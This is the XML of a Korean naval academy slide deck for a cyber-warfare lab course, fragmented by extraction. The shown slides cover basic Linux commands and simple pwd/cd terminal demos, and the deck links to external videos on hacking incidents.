
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bmp" ContentType="image/bmp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83" r:id="rId3"/>
    <p:sldId id="287" r:id="rId4"/>
    <p:sldId id="365" r:id="rId5"/>
    <p:sldId id="366" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="274" r:id="rId13"/>
    <p:sldId id="279" r:id="rId14"/>
    <p:sldId id="280" r:id="rId15"/>
    <p:sldId id="281" r:id="rId16"/>
    <p:sldId id="282" r:id="rId17"/>
    <p:sldId id="284" r:id="rId18"/>
    <p:sldId id="285" r:id="rId19"/>
    <p:sldId id="286" r:id="rId20"/>
    <p:sldId id="355" r:id="rId21"/>
    <p:sldId id="291" r:id="rId22"/>
    <p:sldId id="288" r:id="rId23"/>
    <p:sldId id="292" r:id="rId24"/>
    <p:sldId id="293" r:id="rId25"/>
    <p:sldId id="294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5" r:id="rId41"/>
    <p:sldId id="316" r:id="rId42"/>
    <p:sldId id="317" r:id="rId43"/>
    <p:sldId id="311" r:id="rId44"/>
    <p:sldId id="312" r:id="rId45"/>
    <p:sldId id="313" r:id="rId46"/>
    <p:sldId id="314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6" r:id="rId84"/>
    <p:sldId id="357" r:id="rId85"/>
    <p:sldId id="358" r:id="rId86"/>
    <p:sldId id="359" r:id="rId87"/>
    <p:sldId id="360" r:id="rId88"/>
    <p:sldId id="361" r:id="rId89"/>
    <p:sldId id="362" r:id="rId90"/>
    <p:sldId id="363" r:id="rId91"/>
    <p:sldId id="364" r:id="rId92"/>
    <p:sldId id="268" r:id="rId93"/>
    <p:sldId id="296" r:id="rId94"/>
    <p:sldId id="325" r:id="rId95"/>
    <p:sldId id="290" r:id="rId9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481F0-79A4-4005-98A0-E2D3EC31C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26B3D3-DCCB-4A07-B0DD-5543B7034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9AC3FD-A806-4EBD-B90B-3CD603C7F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A6F7-18CE-4D97-8B22-87968FF9FBF8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AB802B-FA19-43A7-BCDF-A9F08327D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CA637C-E9BE-4CC2-BC4D-84113B59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D742-7A2F-4374-82AC-FDC9B2BE1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42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513E9-3B4F-40F7-9817-FA7FFFB5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C20440-E792-4EAF-90D1-973CFC58F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47AC27-E2EE-453E-84B9-A3DB250B6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A6F7-18CE-4D97-8B22-87968FF9FBF8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64E3D-00A7-4F3D-9072-3E2181DE3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1F152D-39FB-401B-AE62-CAA8D30D8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D742-7A2F-4374-82AC-FDC9B2BE1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90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BEB766-9B37-4186-A52C-BEA602250B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72C367-6AB0-45D0-A9BB-A54DDA36F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76DEC4-3F14-4645-A85E-F57A22A2F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A6F7-18CE-4D97-8B22-87968FF9FBF8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278FE0-5E0A-4072-B202-B9D9624E2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00AEC0-8237-46D8-A127-DD900DDB3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D742-7A2F-4374-82AC-FDC9B2BE1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328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0BD6B-E7FB-4331-875F-864D94F5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E93028-63D9-46D6-8B3A-40AB76FC0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C29581-CF73-4701-803B-266B26247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A6F7-18CE-4D97-8B22-87968FF9FBF8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72EB11-9DDA-43AF-A854-377C80D0A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08E4F2-697A-41EE-985D-36D0A79EA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D742-7A2F-4374-82AC-FDC9B2BE1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112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0D8CB1-852D-401E-B278-FBC5613F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8E5B5A-E122-4CEF-A426-B2355574C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ABCD7-C359-4AFA-8425-996C323D1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A6F7-18CE-4D97-8B22-87968FF9FBF8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87B66A-CE4B-46BB-BB28-42A7D081E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167310-4314-4BB7-AB49-79FE227EE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D742-7A2F-4374-82AC-FDC9B2BE1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088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66D10-FE53-4436-B95E-E2E8F389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2A40FE-884A-4E81-9192-3426D6E7A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60227F-EB33-4B57-8F10-BCA3F2BC2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944643-7641-42D1-B6D5-C9C7EAC11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A6F7-18CE-4D97-8B22-87968FF9FBF8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2BD34A-7C75-41A8-850F-D9160B9B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51D1D3-1BD9-4100-8C71-110C352EE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D742-7A2F-4374-82AC-FDC9B2BE1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329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6A9931-2247-44C9-89DF-059E97134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D8C236-25CD-4439-B9ED-25D389894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B7C5AF-DDC3-48AF-B2D5-F4F947D1F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2C9BCF-920C-4DAB-878F-359E434B3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7625E3-DE59-4610-A6BE-23205B2AFA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2A1A04B-45A7-40BE-91D8-38755C79E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A6F7-18CE-4D97-8B22-87968FF9FBF8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8CCD877-D8CF-4650-BE74-85374E948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EB9669-0D1B-4B47-99C6-16323285D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D742-7A2F-4374-82AC-FDC9B2BE1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785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43F9A-E385-42C7-8701-4D74B5B8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8EB64F-8ED3-41B4-9700-3628CA442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A6F7-18CE-4D97-8B22-87968FF9FBF8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927889-7E0F-400C-AAED-DF87414D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C34461-452C-4ED9-90D0-B4AA91A2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D742-7A2F-4374-82AC-FDC9B2BE1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67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CB02B8-4E17-4DA0-A3EA-0676B7C14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A6F7-18CE-4D97-8B22-87968FF9FBF8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AB1434-C511-48DD-88E3-012FF7B9F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9F2338-A1C3-4BEE-9E95-CA75D1B17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D742-7A2F-4374-82AC-FDC9B2BE1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441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C02C4-867C-42ED-93E1-803EC71FA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2612D-AC7A-4A81-9FE9-9D2CF8438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1AE26A-4CBD-446C-A829-C39559D9A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8CB2B1-EBC3-466A-B38E-9AC64511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A6F7-18CE-4D97-8B22-87968FF9FBF8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933EDA-E4CA-4779-B5D1-986F4F492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15E1F6-72DE-452F-8D71-E6DDE060A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D742-7A2F-4374-82AC-FDC9B2BE1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144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966F9-6418-4A3B-98EC-67D6DA913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428325-C368-44A4-B5A9-5734A2A741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633756-F646-4E38-BB54-CD2404C80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464646-9AA8-494A-9141-A0F72F9C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A6F7-18CE-4D97-8B22-87968FF9FBF8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028736-F7B8-4EFD-B348-7A6030610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6A8044-83D1-4160-82A3-8E2C0A7DD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FD742-7A2F-4374-82AC-FDC9B2BE1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306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17A306-05F3-40CE-AA98-32DCDEE87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4B5F2A-448A-47DA-A1B4-56AD66D74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8726F2-2EEC-4433-A65F-A673E510A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1A6F7-18CE-4D97-8B22-87968FF9FBF8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67D242-A733-4D47-BA32-E853E3ACC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BF35AC-9656-4592-B2F5-ACEBCC347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FD742-7A2F-4374-82AC-FDC9B2BE1E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7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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide56.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide30.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide50.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide43.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide73.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide36.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide34.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6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92.xml"/><Relationship Id="rId4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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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&#50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20mysql%20exploit.mp4" TargetMode="Externa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&#50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20Smarthome%20Hacking%20In%20Real%20World.mp4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20&#51648;&#47280;&#52286;&#44592;%20&#53356;&#47001;.mp4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gif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bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.gif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bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56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bm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bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.gif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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.bm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&#50689;&#49345;/&#51060;&#46976;&#44284;%20&#48513;&#54620;&#51012;%20&#44277;&#44201;&#54616;&#44592;%20&#50948;&#54620;%20&#48120;&#44397;&#51032;%20&#49324;&#51060;&#48260;%20&#54644;&#52964;%20&#50977;&#49457;%20%5b&#49800;&#54140;&#54253;&#53444;%5d.mp4" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#50612;&#45208;&#45768;&#47672;&#49828;%20IS%20&#44277;&#44201;.mp4" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/320%20&#49324;&#51060;&#48260;&#53580;&#47084;.mp4" TargetMode="Externa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&#50689;&#49345;/%5b&#50549;&#52964;&amp;&#47532;&#54252;&#53944;%5d%20&#36557;%20&#45236;&#48512;&#47581;%202&#45380;&#44036;%20&#50808;&#48512;%20&#51217;&#49549;&#8230;&#48372;&#50504;%20&#8216;&#44396;&#47693;&#8217;.mp4" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/Imitation%20Game%20-%20&#50640;&#45768;&#44536;&#47560;%20&#54644;&#46021;%20&#51109;&#47732;.mp4" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#51453;&#44592;&#51204;&#50640;%20&#50508;&#50500;&#50556;%20&#54624;%20&#50669;&#49324;,%20&#48120;&#46300;&#50920;&#51060;%20&#54644;&#51204;.mp4" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/%5b&#51088;&#47561;&#45684;&#49828;%5d%20&#51064;&#53552;&#45367;%20&#51096;%20&#50504;%20&#46104;&#45716;%20&#21271;,%20&#50612;&#46523;&#44172;%20&#49464;&#44228;%20&#44275;&#44275;%20&#54644;&#53433;&#54624;&#44620;%20_%20YTN.mp4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#54644;&#53433;%20vs%20&#54644;&#53433;%20(Hacker%20Vs%20Hacker)%20%5b&#45224;&#44284;&#48513;17%5d.mp4" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#48513;&#54620;%20&#53076;&#47196;&#45208;%20&#51228;&#51312;&#49324;%20&#44277;&#44201;.mp4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bmp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bmp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bm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gif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bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.bm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bmp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bmp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gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.bm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bmp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bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.bm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bmp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.bmp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bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.bmp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bmp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bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.bmp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bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.bmp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bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.bm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gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130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bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.bm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bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.bm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mailto:test01@10.10.1.14" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.bmp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bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.bmp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85.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8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bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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slide" Target="slide83.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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slide" Target="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" Target="slide8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slide" Target="slide8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bmp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8.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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" Target="slide8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0E61B-2259-459B-B631-B6F586300E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사이버전실습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B9020A-949D-434C-B341-DB64D1EDE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4212"/>
            <a:ext cx="9144000" cy="1413588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>해군사관학교</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3782619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FBB328-93E9-4011-A7D7-7D3DC23EF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69" y="5486400"/>
            <a:ext cx="10630230" cy="905247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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가상의 환경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실습환경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에서 자동화 도구를 활용하여 정보체계 취약점에 대한 실시간 공격과 방어과정을 실습합니다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8D83311-7430-4563-8CBA-11D4F53BA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공격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&amp;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방어 실습체계</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/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EF3BBEB8-2000-4F7A-9D5C-B527DC3B2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854" y="1618163"/>
            <a:ext cx="7421659" cy="38098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화살표: 오른쪽 10">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CDE8BAB-00B2-4BDA-B805-8EEE028E48D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53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FBB328-93E9-4011-A7D7-7D3DC23EF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155" y="1690688"/>
            <a:ext cx="3977200" cy="4971502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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실습실 사진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8D83311-7430-4563-8CBA-11D4F53BA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체계 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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46BA5A1-DA53-4E65-BA89-47F367E4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960" y="1690688"/>
            <a:ext cx="4577435" cy="497150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화살표: 오른쪽 5">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB36A63-067F-479E-92E8-85DE509813D7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096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리눅스 기본 명령어</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3444547-EECB-427E-9AE1-01791E210C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2169459"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1694953" y="1791679"/>
          <a:ext cx="8802093" cy="4677792"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="388289">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="858741">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3101008">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="429371">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="699377342"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1121134">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="438747241"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2903550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1398612021"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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링크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명령어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번호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명령어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3706695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1231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2" action="ppaction://hlinksldjump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pwd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현재 작업중인 디렉토리 정보 출력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grep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585991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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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cd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경로 이동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echo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651176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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>3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ls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디렉토리 목록 확인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sort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133713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4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cp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파일 혹은 디렉토리를 복사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sudo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401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mv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파일 혹은 디렉토리 이동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chown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518544"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2252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6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mkdir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디렉토리 생성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man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6233967"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2047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rm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파일이나 디렉토리를 삭제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tar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852548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1842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8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touch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최근 업데이트 일자를 현재 시간으로 변경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ifconfig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251521"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1637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cat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여러 개의 파일 합치기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ln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2879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head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파일의 앞부분을 보고싶은 줄 수만큼 보여준다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vi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104482"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2183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tail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파일의 뒷부분을 보고싶은 줄 수만큼 보여준다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.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29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python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078621"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1910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find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특정 파일이나 디렉토리를 검색한다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nmap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730360"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1637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ps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현재 실행중인 프로세스 목록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init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454855"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1364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kill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프로세스 강제 중지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2584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service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시스템 전체 서비스 호출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3332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batch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배치파일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미리 정의된 시스템 명령어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실행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4641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shutdown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090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18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wget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045932"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="화살표: 오른쪽 7">
            <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07798558-9F7B-420B-8B5A-377A32580A5E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768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/Theory/T2/1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#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pwd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AF6558-568E-4777-99D4-A4F9B13500B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="5109376" cy="4940700"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="413467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0AC1EEE-5520-419D-B63B-801AA0EA6ADA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="4134678"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 957"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="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BAFEAF-1F5B-4B04-BB6F-31FB49C724CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="450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~]#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pwd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/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/root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CBAA306-1D88-4A15-96F8-E388EFB7E860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6244426" y="1690688"/>
            <a:ext cx="5109376" cy="4940700"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="413467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C4E800B-8A77-4FC2-BF86-22EA3F3C1F51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="4134678"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 957"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="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932B58-AC0C-4366-93A7-7A6F08B092DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="251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endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="화살표: 오른쪽 12">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BFB7D03-7122-4A97-A037-9E595D4BC5BD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743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/Theory/T2/2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#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cd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AF6558-568E-4777-99D4-A4F9B13500B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="5109376" cy="4940700"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="413467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0AC1EEE-5520-419D-B63B-801AA0EA6ADA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="4134678"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 957"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="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BAFEAF-1F5B-4B04-BB6F-31FB49C724CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="2235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~]# cd /var/www/html/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webhack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/example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example]#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pwd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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/example</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/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example]# cd ..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webhack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]#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pwd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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>webhack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/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webhack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]# cd ~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~]#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pwd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/root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CBAA306-1D88-4A15-96F8-E388EFB7E860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6244426" y="1690688"/>
            <a:ext cx="5109376" cy="4940700"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="413467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C4E800B-8A77-4FC2-BF86-22EA3F3C1F51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="4134678"/>
            </a:xfrm>
